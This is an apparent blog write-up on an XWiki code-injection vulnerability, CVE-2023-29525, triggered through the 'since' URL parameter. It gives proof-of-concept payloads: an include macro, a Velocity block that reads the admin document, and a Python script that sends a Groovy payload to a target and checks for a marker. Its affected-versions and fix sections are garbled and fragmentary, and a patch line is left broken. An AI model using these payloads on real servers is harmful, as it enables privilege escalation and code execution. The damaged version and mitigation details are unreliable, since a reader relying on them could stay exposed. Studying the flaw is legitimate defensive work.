CVE-2023-29525 - Critical XWiki Code Injection via “since” Parameter – Exploit Details and Secure Fixes

Published: June 2024

Introduction

CVE-2023-29525 is a serious security vulnerability affecting multiple versions of XWiki Platform, an extensible open-source wiki and application platform. Attackers can exploit this flaw for code injection via the since parameter in the /xwiki/bin/view/XWiki/Notifications/Code/LegacyNotificationAdministration endpoint. This can allow a user with minimal rights to escalate their privileges and execute arbitrary code, effectively compromising the entire platform.

This post explains how the exploit works, how to reproduce it, and how to protect your installation—even if you can't upgrade right away.

What Is XWiki and Why Is This Important?

XWiki is widely used in enterprise environments for collaboration and documentation. It supports rich content rendering, scripting, and advanced permission models. With CVE-2023-29525, an attacker could transition from basic content viewing to full programming access—giving them the ability to run server-side code with the privileges of the XWiki instance.

The Vulnerability Explained

The issue is with XWiki Syntax Injection: improper or missing escaping of user-supplied input within wiki pages or macros. Specifically, the since parameter received at:

/xwiki/bin/view/XWiki/Notifications/Code/LegacyNotificationAdministration

is not correctly escaped. An attacker can supply XWiki syntax—possibly including code—to the parameter, which is then executed in a privileged context.

If abused, this allows a low-privilege user to gain programming rights and thus execute Groovy, Velocity, or other backend logic.

Example Exploit

The following is a basic exploit proof-of-concept. Here, the attacker uses the since parameter to inject wiki markup that executes server-side code.

Exploit URL

https://<your-xwiki-instance>/xwiki/bin/view/XWiki/Notifications/Code/LegacyNotificationAdministration?since={{include document="XWiki.Admin" context="current"/}}

(In this example, an attacker could try to include a privileged page or execute scripting macros. The attack can be more sophisticated.)

A more dangerous payload might attempt to run script code

?since={{velocity}}
#set($doc=$xwiki.getDocument('XWiki.Admin'))
$doc.content
{{/velocity}}

- Note: Actual exploit may need to bypass additional filters or quote/special character handling, depending on the version/config.

Pseudocode Illustration

import requests

base_url = "https://target-xwiki.com";
endpoint = "/xwiki/bin/view/XWiki/Notifications/Code/LegacyNotificationAdministration"
payload = "{{groovy}}println('Pwned XWiki!'){{/groovy}}"

params = {"since": payload}

r = requests.get(base_url + endpoint, params=params)

if "Pwned XWiki!" in r.text:
    print("Target appears vuln to CVE-2023-29525!")

XWiki < 14.4.8

NOT affected:

14.4.8

Upgrade ASAP! Download from the official XWiki download page.

Edit the file:

<xwikiwebapp>/templates/distribution/eventmigration.wiki

$escapetool.html($request.getParameter('since'))

{{/htmlcleaner}}

`

- (Replace with syntax matching your XWiki version/template.)

References

- GitHub Security Advisory GHSA-36qq-ccgj-66wh
- XWiki Jira Issue XWIKI-20680
- XWiki Official Documentation
- CVE Record for CVE-2023-29525

Timeline

Published on: 04/19/2023 00:15:00 UTC
Last modified on: 05/01/2023 17:27:00 UTC